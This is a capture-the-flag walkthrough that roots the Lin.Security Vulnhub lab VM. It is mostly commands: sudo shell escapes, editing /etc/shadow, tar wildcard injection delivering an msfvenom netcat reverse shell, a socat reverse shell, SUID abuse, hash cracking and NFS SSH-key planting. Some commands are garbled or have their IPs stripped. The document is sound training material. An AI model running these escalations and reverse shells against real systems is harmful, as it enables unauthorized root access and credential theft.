Hack the Lin.Security VM (Boot to Root)

As we know how some weak misconfiguration sudo rights can lead to root privilege escalation and today I am going to solve the CTF “Lin.Security – Vulnhub” which is design on weak sudo right permissions for beginners to test their skillset through this VM.
This lab has been designed by the researcher to help us understand, how certain built-in applications and services if misconfigured, may be abused by an attacker. Here an up-to-date Ubuntu distro (18.04 LTS) suffers from a number of vulnerabilities that allow a user to escalate to root on the box.

You can downloaad it from here: https://www.vulnhub.com/entry/linsecurity-1,244/

Task : Get root shell for ALL Users (Bob, Susan, Peter)
Level: Beginner to Advance

Penetrating Methodologies
Escalate root shell for Bob
·         Via sudo right
·         Via wildcard Injection
·         Via SUID Binaries
Escalate root shell for Susan
·         Via SUID Binaries
Escalate root shell for Peter
·         Via Network file sharing (NFS)

Note: Kindly follow the refernce link given in the article for details, because this machine vulnerbale to bunch of services and refrence link holds detail of each Privlege Escalation Techniques .

Escalate root shell for Bob
1st Procedures
                    Login using ssh credential
                    Check sudoers list for sudo permissions
                    Get root shell via system binaries having sudo permission  

Let’s move now to find the ways to root this lab!!

The first thing before doing any of the CTF is to read the instructions carefully before starting your vulnerability assessment and save your precious time.

The writer of the lab has given a hint in terms of user-id & password of one of the users.

It is “To get started you can log onto the host with the credentials: bob/secret“ and the IP of my lab is

I used the port 22 (SSH) to login into the machine with given credentials: bob/secret
ssh bob@
After ‘logging in’ I tried to check the sudo rights for user bob:

sudo -l

The next prompt asked for the root password and I tried the same credentials “secret” and it worked!! I can see all the permissions which bob has and now I can easily root the machine using any of these permitted commands.
Visit given below link for complete details:

As you can observe that we had escalated root shell when sudo have rights for all types of shell such as ksh, zsh, bash and so on or for editors or for other programs such as pico, vi, perl, scp, find, less and so on. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.
You can use following list of command to get root shell:
sudo ash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo bash
sudo sh
sudo csh
sudo dash
sudo tclsh
sudo zsh
find /home -exec /bin/bash \;
Get root shell via FTP, Expect, Socat
With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.
sudo ftp
sudo expect
sudo env /bin/bash
sudo ed
sudo perl -e 'exec' "/bin/bash";'
sudo socat exec:'bash -sh',pty,stderr,setsid,sigint,sane tcp:

On other you should be in listening mode by using socat listener in your local machine to get privilege shell:
socat file:`tty`,raw,echo=0 tcp-listen:1234

With less we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.
sudo less /etc/hosts
As we know it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside hosts file as shown above and you will get root shell.

Man can be used to break out from restricted environments by spawning an interactive system shell.
sudo man /etc/hosts

As we know it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside hosts file as shown above and you will get root shell.

With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.
sudo git help status
As we know it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside git status file as shown above and you will get root shell.

Since we know that pico is a text editor such as nano and vi also has sudo permission, which means that now we can also edit system files. Now open /etc/shadow file with pico editor and try to modify the root password.

On other hands I have generated a new encrypted password: pass123 using openssl passwd
openssl passwd -1 -salt abc pass123
Now paste the above generated encrypted password inside shadow file for user root.

Since we have modify the root password into pass123 therefore let get root login using it.
su root

It can be used to break out from restricted environments by spawning an interactive system shell. It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.
echo “/bin/bash 0<&2 1>&2” > $hack
chmod +x "$hack"
sudo scp -S $hack abc abd:

With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable. Let’s spawn interactive root shell through Proxy Command option.
sudo ssh -o ProxyCommand=”;/bin/bash 0<&2 1>&2” abc

With this we can spawn the interactive system shell and can get away from low-privilege environments. Since we have low privilege shell which means, we can access /etc/passswd file.

So, I copied /etc/passwd file in my local machine and removed encrypted password for user “insecurity”.
By running curl with sudo permission we can fetch a remote file via http-get method.
So, as you can observe that now we are having modified passwd file where user insecurity has an entry with UID: GID 0:0 and no password.
Since we have modify the insurity password into blank password therefore let get root login using it.
sudo -u insecurity bash

Vi Editor
With this we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable.

Type following:
sudo vi
All you can observe that I have root shell after this.
With rvim we can spawn the root shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable. This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Now enter following command to spawn /bin/sh shell with higher privilege shell.

sudo rvim -c “:py3 import pty; pty.spwn(‘/bin/sh’)”
You will see, it opens the file in vi mode and since you have run command with sudo right which means we can get shell through it. Execute !bash command inside it as shown below and you will get root shell.
2nd Procedures
                    Wildcard Injection
                    Check cron job
                    Generate one-liner for netcat_reverse shell (msfvenom)
                    Exploit tar wildcard injection
                    Spawn root shell through netcat session

Now open crontab to view if any task is scheduled.
cat /etc/crontab
Here we notice the target has scheduled a bash program script for every 1 minute and we know that cron job runs as root. The minute attacker read the program written inside /etc/cron.daily/backup script, since it is saving a compressed copy of each user’s home directories to /etc/backups. Therefore we can apply tar wildcard injection.
Visit below link to read complete detail of wildcard injection attack: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

On a new terminal in your Kali to generate netcat reverse shell malicious code for achieving netcat reverse connection by using msfvenom and enter the following command for that:
msfvenom -p cmd/unix/reverse_netcat lhost= lport=8888 R
Now copy the generated payload and paste inside victim’s shell as described below.
echo "mkfifo /tmp/ckrkrjp; nc 8888 0
/tmp/ckrkrjp 2>&1; rm /tmp/ckrkrjp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Since the tar command is running as root due to crontab, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888. And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in after 1 minute.
nc -lvp 8888

3rd Procedures
                    Identify SUID binaries with find command
                    Exploit SUID binary

find / -perm -u=s -type f 2>/dev/null
Here xxd and taskset are system binaries file having suid permissions and with this we can spawn the interactive system shell and can get away from low-privilege environments.
Visit below link to read complete detail of SUID Privilege Escalation:

It was quite easy to get root shell through taskset but fail to get privilege via xxd, although you can execute below command to get root shell.
taskset 1/bin/sh -p

Escalate root shell for Susan
                    Identify SUID Binary with find command
                    Exploiting SUID binary
                    Read /etc/shadow through xxd
                    Get root password
                    Crack root password
                    Get Root shell

Let’s get into /home directory where we discover 3 users’ directory bob, susan and peter. Since we have escalated root shell via bob in all possible way but now I’m curious in penetrating /susan directory. So while exploring /susan; I found password “MySuperS3cretValue!” from inside .secret

So we logged as Susan with the help of password we found inside .secret, next we need escalated root privilege because we are again in low privilege shell. As we knew xxd has suid permission therefore we try to escalated root privilege with following command
xxd is a Linux command that creates a hexdump of a given file when it has read permissions and as we know SUID bit is enable for xxd hence we can use it to read the information of /etc/shadow file.
xxd “/ect/shadow” | xxd -r

Once you have shadow file on your screen, copy the encrypted text for user root and crack it either with john the ripper or other resources.  So I have used online hash cracking tools and found the root password “secret123” and logged with it.
Escalate root shell for Peter
·         Exploiting NFS
·         Mount share directory
·         Create SSH pair key
·         Replace your pub_key to users’ authorized_keys
·         Get SSH login session for peter
·         Exploit Sudo right to get root shell

On scanning its network we found port 2049 is open for network share therefore we run showmount command to identify share directory
showmount -e
mkdir /tmp/raj
mount /tmp/raj
ls -al /tmp/raj

But I mount /home/peter in our /tmp/raj directory, I didn’t find anything here, truthfully when I try to create .ssh directory, it gave permission deny error therefore I create a fake peter account with an UID of 1001 on my Kali machine and successfully created .ssh folder as shown below steps.
groupadd -g 1005 peter
adduser peter -uid 1001 -gid 1005
su peter
cd /tmp/raj
mkdir .ssh
cat ~/.ssh/id_rsa.pub >> /tmp/raj/.ssh/authorized_keys
Now create SSH pair key and add your public SSH key to the users’ authorized_keys file and it allows you to log in as the target user, assuming that you have the appropriate private key.
Therefore follow below steps:
cd /tmp/raj
mkdir .ssh
cat ~/.ssh/id_rsa.pub >> /tmp/raj/.ssh/authorized_keys
Booomm!! Booomm!! We're logged in as Peter. There multiple way to exploit NFS services, it totally depends on situation. Visit the link below to learn more about NFS Privilege Escalation:
Now let’s check peter's sudo permission for user peter:
sudo -l
So, here peter can run strace commands with sudo which means we can spawn the interactive system shell and can get away from low-privilege environments. It goes in privileged environment with elevated privileges to access the file system or elevate root shell if sudo permission is enable
sudo strace -o /dev/null /bin/sh


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